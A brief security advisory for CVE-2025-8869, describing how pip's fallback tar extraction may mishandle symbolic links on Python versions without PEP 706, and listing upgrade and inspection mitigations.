CVE-2025-8869

Name of the Vulnerable Software and Affected Versions pip (affected versions not specified)

Description An issue exists in pip where it may not properly check symbolic links when extracting tar archives if the tarfile module does not implement PEP 706. This can occur when using Python versions that do not implement PEP 706, and pip uses its fallback implementation for tar extraction. Upgrading pip to a fixed version does not address all known issues remediated by using a Python version that implements PEP 706. Mitigations include upgrading to a version of pip that includes the fix, upgrading to a Python version that implements PEP 706 (Python versions 3.9.17 and later, 3.10.12 and later, 3.11.4 and later, or 3.12 and later), applying the associated patch, or inspecting source distributions before installation.

Recommendations Upgrade to a version of pip that includes the fix. Upgrade to Python version 3.9.17 or later. Upgrade to Python version 3.10.12 or later. Upgrade to Python version 3.11.4 or later. Upgrade to Python version 3.12 or later. Apply the associated patch. Inspect source distributions before installation.